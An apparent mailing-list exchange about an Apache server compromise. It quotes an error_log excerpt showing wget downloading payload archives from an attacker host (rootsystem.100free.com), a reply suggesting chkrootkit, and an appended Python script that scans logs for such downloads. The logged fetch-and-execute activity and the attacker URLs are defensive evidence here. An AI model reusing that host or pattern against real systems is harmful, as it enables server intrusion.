Dan Eskildsen wrote:
> Somehow my server is being hacked through Apache but I don't know how they are
> getting in. The hackers upload files to my /tmp or /var/tmp directories,
> then they are able to execute the files that they upload.
>
> I have disabled the following in Apache: proxies and cgi but they are still
> getting in. Any ideas?
>
> I have discovered the following in Apache's error log.
>
> ###Following is a snip from my /var/log/httpd/error_log: ################
> --02:09:07-- http://rootsystem.100free.com/sk.zip
> => `sk.zip'
> Resolving rootsystem.100free.com... done.
> Connecting to rootsystem.100free.com[64.156.241.133]:80... connected.
> HTTP request sent, awaiting response... 302 Found
> Location: http://www.100free.com/404.html [following]
> --02:09:07-- http://www.100free.com/404.html
> => `404.html'
> Resolving www.100free.com... done.
> Connecting to www.100free.com[64.156.241.61]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 991 [text/html]
>
> 0K 100% 967.77 KB/s
>
> 02:09:08 (967.77 KB/s) - `404.html' saved [991/991]
>
> chmod: failed to get attributes of `sk.zip': No such file or directory
> --02:09:55-- http://rootsystem.100free.com/dcpl.zip
> => `dcpl.zip'
> Resolving rootsystem.100free.com... done.
> Connecting to rootsystem.100free.com[64.156.241.133]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 759 [application/zip]
>
> 0K 100% 741.21 KB/s
>
> 02:09:56 (741.21 KB/s) - `dcpl.zip' saved [759/759]
>
> ### End of snip ################
>
>
You might want to install chkrootkit and scan for known rootkits on the
system.
Dan
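
An added example, not part of either message above: wget and chmod output appears in error_log because commands started by the web server process write their stderr there, so the log itself can be searched for downloads of this kind. The sketch below assumes the older wget transcript format shown in the excerpt; the first Apache-style line of the sample and the list of tool names in `TOOL_ERR` are constructed for illustration.

```python
import re

# Constructed sample modelled on the quoted excerpt (quote prefixes removed).
SAMPLE_LOG = """\
[Sat Jan 01 02:08:59 2005] [error] [client 192.0.2.10] File does not exist: /var/www/html/x
--02:09:07--  http://rootsystem.100free.com/sk.zip
           => `sk.zip'
HTTP request sent, awaiting response... 302 Found
Location: http://www.100free.com/404.html [following]
--02:09:07--  http://www.100free.com/404.html
           => `404.html'
HTTP request sent, awaiting response... 200 OK
02:09:08 (967.77 KB/s) - `404.html' saved [991/991]
chmod: failed to get attributes of `sk.zip': No such file or directory
--02:09:55--  http://rootsystem.100free.com/dcpl.zip
           => `dcpl.zip'
HTTP request sent, awaiting response... 200 OK
02:09:56 (741.21 KB/s) - `dcpl.zip' saved [759/759]
"""

START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
STATUS = re.compile(r"^HTTP request sent, awaiting response\.\.\. (\d{3})")
SAVED = re.compile(r"^\d\d:\d\d:\d\d \(.*?\) - `(.+?)' saved \[(\d+)/\d+\]")
# Assumed list of tools whose stderr is worth flagging; extend as needed.
TOOL_ERR = re.compile(r"^(chmod|sh|tar|unzip|perl): (.+)")

def scan(lines):
    """Return (fetches, tool_errors) found in an iterable of error_log lines."""
    fetches, tool_errors = [], []
    for raw in lines:
        line = raw.strip()
        if m := START.match(line):          # a new wget request begins
            fetches.append({"time": m[1], "url": m[2],
                            "status": None, "saved": None, "bytes": 0})
        elif fetches and (m := STATUS.match(line)):
            fetches[-1]["status"] = int(m[1])
        elif fetches and (m := SAVED.match(line)):
            fetches[-1]["saved"], fetches[-1]["bytes"] = m[1], int(m[2])
        elif m := TOOL_ERR.match(line):     # stderr from another spawned command
            tool_errors.append((m[1], m[2]))
    return fetches, tool_errors

if __name__ == "__main__":
    fetches, errors = scan(SAMPLE_LOG.splitlines())
    for f in fetches:
        print(f["time"], f["status"], f["url"], "->", f["saved"], f["bytes"])
    for tool, msg in errors:
        print("stderr from", tool + ":", msg)
```

Run against the real log with `scan(open("/var/log/httpd/error_log", errors="replace"))`; the timestamps of each hit can then be matched against access_log entries to find the request that started the command.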